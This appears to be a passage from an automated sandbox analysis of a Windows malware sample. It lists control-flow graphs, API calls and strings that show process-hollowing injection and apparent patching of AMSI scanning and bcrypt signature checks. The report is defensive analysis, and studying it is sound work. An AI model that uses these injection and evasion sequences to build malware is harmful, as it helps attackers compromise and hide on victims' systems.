29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtReadVirtualMemory 6992->7100 7171 2998fcc-2999038 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 7100->7171 7172 2998cc5-2998e2e call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtUnmapViewOfSection 7100->7172 7199 299903d-29991bd call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2997944 7171->7199 7258 2998e58-2998ec4 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 7172->7258 7259 2998e30-2998e4c call 2997944 7172->7259 7199->6839 7303 29991c3-29992bc call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29980c8 7199->7303 7268 2998ec9-2998fc0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2997944 7258->7268 7265 2998e51-2998e56 7259->7265 7265->7268 7338 2998fc5-2998fca 7268->7338 7352 29992be-299930b call 2997fc0 call 2997fb4 7303->7352 7353 2999310-2999c8e call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtWriteVirtualMemory call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtWriteVirtualMemory call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 SetThreadContext NtResumeThread call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2982c2c call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2997cc8 * 3 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2997cc8 * 2 call 298480c call 298494c call 2984798 call 298494c call 2997cc8 call 298480c call 298494c call 2984798 call 298494c call 2997cc8 * 7 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 7303->7353 7338->7199 7352->7353 7353->6839
                                                                              APIs
                                                                                • Part of subcall function 02997E14: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02997F0D), ref: 02997E4C
                                                                                • Part of subcall function 02997E14: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02997F0D), ref: 02997E5A
                                                                                • Part of subcall function 02997E14: GetProcAddress.KERNEL32(75370000,00000000), ref: 02997E73
                                                                                • Part of subcall function 02997E14: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000,00000000), ref: 02997EE2
                                                                                • Part of subcall function 02997E14: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000), ref: 02997EED
                                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029D73BC,029D73AC,OpenSession,029D7384,02999D18,ScanString,029D7384), ref: 029986B6
                                                                              • GetThreadContext.KERNEL32(00000894,029D7400,ScanString,029D7384,02999D18,UacInitialize,029D7384,02999D18,ScanBuffer,029D7384,02999D18,ScanBuffer,029D7384,02999D18,UacInitialize,029D7384), ref: 02998A4F
                                                                              • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000898,003F7FF8,029D74D4,00000004,029D74DC,ScanBuffer,029D7384,02999D18,ScanString,029D7384,02999D18,Initialize,029D7384,02999D18,UacScan,029D7384), ref: 02998CAC
                                                                              • NtUnmapViewOfSection.N(00000898,00400000,ScanBuffer,029D7384,02999D18,ScanString,029D7384,02999D18,Initialize,029D7384,02999D18,00000898,003F7FF8,029D74D4,00000004,029D74DC), ref: 02998E27
                                                                                • Part of subcall function 02997944: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997951
                                                                                • Part of subcall function 02997944: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02997957
                                                                                • Part of subcall function 02997944: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02997977
                                                                              • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000898,00400000,00000000,17D5E400,029D74DC,ScanBuffer,029D7384,02999D18,ScanString,029D7384,02999D18,Initialize,029D7384,02999D18,ScanBuffer,029D7384), ref: 0299947B
                                                                              • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000898,003F7FF8,029D74D8,00000004,029D74DC,ScanBuffer,029D7384,02999D18,ScanString,029D7384,02999D18,Initialize,029D7384,02999D18,00000898,00400000), ref: 029995EE
                                                                              • SetThreadContext.KERNEL32(00000894,029D7400,ScanBuffer,029D7384,02999D18,ScanString,029D7384,02999D18,Initialize,029D7384,02999D18,00000898,003F7FF8,029D74D8,00000004,029D74DC), ref: 02999764
                                                                              • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00000000,00000894,029D7400,ScanBuffer,029D7384,02999D18,ScanString,029D7384,02999D18,Initialize,029D7384,02999D18,00000898,003F7FF8,029D74D8), ref: 02999771
                                                                                • Part of subcall function 02997CC8: LoadLibraryW.KERNEL32(bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18,ScanBuffer,029D7384,02999D18,Initialize,029D7384,02999D18,UacScan), ref: 02997CDC
                                                                                • Part of subcall function 02997CC8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02997CF6
                                                                                • Part of subcall function 02997CC8: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000898,00000000,029D7368,00000001,029D7374,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18), ref: 02997D1C
                                                                                • Part of subcall function 02997CC8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18,ScanBuffer,029D7384,02999D18,Initialize), ref: 02997D32
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MemoryVirtual$Library$AddressProcThreadWrite$ContextFreeHandleLoadModule$AllocateCacheCreateFlushInstructionProcessReadResumeSectionUnmapUserView
                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                              • API String ID: 3118559676-51457883
                                                                              • Opcode ID: 2d7264444570c5e3af3e248cb62a6be16325ccdc324eff6384d5d53cdaf12a07
                                                                              • Instruction ID: a6dfb7b387dfde8f48966b517cbe65386130723de8bbcf1d46f689bb5078ac4d
                                                                              • Opcode Fuzzy Hash: 2d7264444570c5e3af3e248cb62a6be16325ccdc324eff6384d5d53cdaf12a07
                                                                              • Instruction Fuzzy Hash: F3E20C75A501199FEF21FBA8CD81EDEB3BAAFC5310F1454E5A009AB254DE30AE85CF50
                                                                              Function 029981B6 Relevance: 54.1, APIs: 8, Strings: 22, Instructions: 1577nativeprocessthreadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 7638 29981b6-29981bb 7640 29981c0-29981c5 7638->7640 7640->7640 7641 29981c7-29982ae call 298493c call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 7640->7641 7672 2999c93-2999cfd call 29844d0 * 2 call 2984c0c call 29844d0 call 29844ac call 29844d0 * 2 7641->7672 7673 29982b4-299838f call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 7641->7673 7673->7672 7717 2998395-29986bd call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29830d4 * 2 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984d8c call 2984d9c CreateProcessAsUserW 7673->7717 7824 29986bf-299872b call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 7717->7824 7825 2998730-2998a56 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2982ee0 call 2982f08 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 GetThreadContext 7717->7825 7824->7825 7825->7672 7933 2998a5c-2998cbf call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtReadVirtualMemory 7825->7933 8004 2998fcc-2999038 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 7933->8004 8005 2998cc5-2998e2e call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtUnmapViewOfSection 7933->8005 8032 299903d-29991bd call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2997944 8004->8032 8091 2998e58-2998ec4 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 8005->8091 8092 2998e30-2998e56 call 2997944 8005->8092 8032->7672 8136 29991c3-29992bc call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29980c8 8032->8136 8101 2998ec9-2998fca call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2997944 8091->8101 8092->8101 8101->8032 8185 29992be-299930b call 2997fc0 call 2997fb4 8136->8185 8186 2999310-2999c8e call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtWriteVirtualMemory call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtWriteVirtualMemory call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 SetThreadContext NtResumeThread call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2982c2c call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2997cc8 * 3 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2997cc8 * 2 call 298480c call 298494c call 2984798 call 298494c call 2997cc8 call 298480c call 298494c call 2984798 call 298494c call 2997cc8 * 7 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 8136->8186 8185->8186 8186->7672
                                                                              APIs
                                                                                • Part of subcall function 02997E14: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02997F0D), ref: 02997E4C
                                                                                • Part of subcall function 02997E14: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02997F0D), ref: 02997E5A
                                                                                • Part of subcall function 02997E14: GetProcAddress.KERNEL32(75370000,00000000), ref: 02997E73
                                                                                • Part of subcall function 02997E14: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000,00000000), ref: 02997EE2
                                                                                • Part of subcall function 02997E14: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000), ref: 02997EED
                                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029D73BC,029D73AC,OpenSession,029D7384,02999D18,ScanString,029D7384), ref: 029986B6
                                                                              • GetThreadContext.KERNEL32(00000894,029D7400,ScanString,029D7384,02999D18,UacInitialize,029D7384,02999D18,ScanBuffer,029D7384,02999D18,ScanBuffer,029D7384,02999D18,UacInitialize,029D7384), ref: 02998A4F
                                                                              • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000898,003F7FF8,029D74D4,00000004,029D74DC,ScanBuffer,029D7384,02999D18,ScanString,029D7384,02999D18,Initialize,029D7384,02999D18,UacScan,029D7384), ref: 02998CAC
                                                                              • NtUnmapViewOfSection.N(00000898,00400000,ScanBuffer,029D7384,02999D18,ScanString,029D7384,02999D18,Initialize,029D7384,02999D18,00000898,003F7FF8,029D74D4,00000004,029D74DC), ref: 02998E27
                                                                                • Part of subcall function 02997944: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997951
                                                                                • Part of subcall function 02997944: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02997957
                                                                                • Part of subcall function 02997944: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02997977
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleLibraryMemoryModuleProcVirtual$AllocateCacheContextCreateFlushFreeInstructionLoadProcessReadSectionThreadUnmapUserView
                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                              • API String ID: 1803274339-51457883
                                                                              • Opcode ID: a601048772cfb2d7616f5cf851a574f41bf0285b344385b17a282aaa84a7c0dc
                                                                              • Instruction ID: 94f548662f857131f022fa3e7de1cf85fb045195f92758bd9258e7bf46314ad1
                                                                              • Opcode Fuzzy Hash: a601048772cfb2d7616f5cf851a574f41bf0285b344385b17a282aaa84a7c0dc
                                                                              • Instruction Fuzzy Hash: FFE20C75A501199FEF21FBA8CD81EDEB3BAAFC5310F1454A5A009AB254DE30AE85CF50
                                                                              Function 02985A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 11217 2985a78-2985ab9 GetModuleFileNameA RegOpenKeyExA 11218 2985afb-2985b3e call 29858b4 RegQueryValueExA 11217->11218 11219 2985abb-2985ad7 RegOpenKeyExA 11217->11219 11224 2985b40-2985b5c RegQueryValueExA 11218->11224 11225 2985b62-2985b7c RegCloseKey 11218->11225 11219->11218 11220 2985ad9-2985af5 RegOpenKeyExA 11219->11220 11220->11218 11222 2985b84-2985bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 11220->11222 11226 2985bbb-2985bbf 11222->11226 11227 2985c9e-2985ca5 11222->11227 11224->11225 11228 2985b5e 11224->11228 11230 2985bcb-2985be1 lstrlenA 11226->11230 11231 2985bc1-2985bc5 11226->11231 11228->11225 11232 2985be4-2985be7 11230->11232 11231->11227 11231->11230 11233 2985be9-2985bf1 11232->11233 11234 2985bf3-2985bfb 11232->11234 11233->11234 11235 2985be3 11233->11235 11234->11227 11236 2985c01-2985c06 11234->11236 11235->11232 11237 2985c08-2985c2e lstrcpynA LoadLibraryExA 11236->11237 11238 2985c30-2985c32 11236->11238 11237->11238 11238->11227 11239 2985c34-2985c38 11238->11239 11239->11227 11240 2985c3a-2985c6a lstrcpynA LoadLibraryExA 11239->11240 11240->11227 11241 2985c6c-2985c9c lstrcpynA LoadLibraryExA 11240->11241 11241->11227
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02980000,029AB790), ref: 02985A94
                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02980000,029AB790), ref: 02985AB2
                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02980000,029AB790), ref: 02985AD0
                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02985AEE
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02985B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02985B37
                                                                              • RegQueryValueExA.ADVAPI32(?,02985CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02985B7D,?,80000001), ref: 02985B55
                                                                              • RegCloseKey.ADVAPI32(?,02985B84,00000000,?,?,00000000,02985B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02985B77
                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02985B94
                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02985BA1
                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02985BA7
                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02985BD2
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02985C19
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02985C29
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02985C51
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02985C61
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02985C87
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02985C97
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                              • API String ID: 1759228003-2375825460
                                                                              • Opcode ID: a89973d87c030b4cf17730beb74d89c4a4c633d7efdd3ed6801e04b15f75d544
                                                                              • Instruction ID: 23def2c09a425f169f54f8c6aba11bb05b480a96eb552cbe9b068780dc78d36e
                                                                              • Opcode Fuzzy Hash: a89973d87c030b4cf17730beb74d89c4a4c633d7efdd3ed6801e04b15f75d544
                                                                              • Instruction Fuzzy Hash: 4D51B571A4020C7EFB25EAE4CC46FEF77AD9B44754F8A01A5A704E61C0DB749A488F61
                                                                              Function 02997A92 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45librarynativeloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02997B18,?,?,00000000), ref: 02997AD8
                                                                              • GetProcAddress.KERNEL32(00000000,ntdll), ref: 02997ADE
                                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?,00000000,ntdll,00000000,00000000,02997B18,?,?,00000000), ref: 02997AFC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                                              • String ID: NtWriteV$irtualMemory$ntdll
                                                                              • API String ID: 4260932595-852282483
                                                                              • Opcode ID: c207579aefcfa06b31b5dde2012ec39a14c75e6d7984d0ed3bf3ae69c383cb48
                                                                              • Instruction ID: e2bb293f6bf61f99d05aeac348d59b27039474bac2664c4698ef71f1bb074f9c
                                                                              • Opcode Fuzzy Hash: c207579aefcfa06b31b5dde2012ec39a14c75e6d7984d0ed3bf3ae69c383cb48
                                                                              • Instruction Fuzzy Hash: F6014FB5654208AFEB00EFE8D841DEFF7EDEB88720B554868B904D7600DA30ED109B60
                                                                              Function 02997A94 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 44librarynativeloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02997B18,?,?,00000000), ref: 02997AD8
                                                                              • GetProcAddress.KERNEL32(00000000,ntdll), ref: 02997ADE
                                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?,00000000,ntdll,00000000,00000000,02997B18,?,?,00000000), ref: 02997AFC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                                              • String ID: NtWriteV$irtualMemory$ntdll
                                                                              • API String ID: 4260932595-852282483
                                                                              • Opcode ID: 27a9e208ba267549223fcf2d499669c4c77c0c5a00f0ac53e71eeb96387d6cbe
                                                                              • Instruction ID: 0c0e47be9cf5064da766e6527c5321fc2e6e7e521cc967ff7f20afe75fd05143
                                                                              • Opcode Fuzzy Hash: 27a9e208ba267549223fcf2d499669c4c77c0c5a00f0ac53e71eeb96387d6cbe
                                                                              • Instruction Fuzzy Hash: D1014FB5654208AFDB00EFE8D841DEFF7EDEB88720B554868B904D7600DA30ED109B60
                                                                              Function 02997CC8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40librarynativeloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 12957 2997cc8-2997ced LoadLibraryW 12958 2997cef-2997d07 GetProcAddress 12957->12958 12959 2997d37-2997d3d 12957->12959 12960 2997d09-2997d28 NtWriteVirtualMemory 12958->12960 12961 2997d2c-2997d32 FreeLibrary 12958->12961 12960->12961 12962 2997d2a 12960->12962 12961->12959 12962->12961
                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18,ScanBuffer,029D7384,02999D18,Initialize,029D7384,02999D18,UacScan), ref: 02997CDC
                                                                              • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02997CF6
                                                                              • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000898,00000000,029D7368,00000001,029D7374,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18), ref: 02997D1C
                                                                              • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18,ScanBuffer,029D7384,02999D18,Initialize), ref: 02997D32
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                              • String ID: BCryptVerifySignature$bcrypt
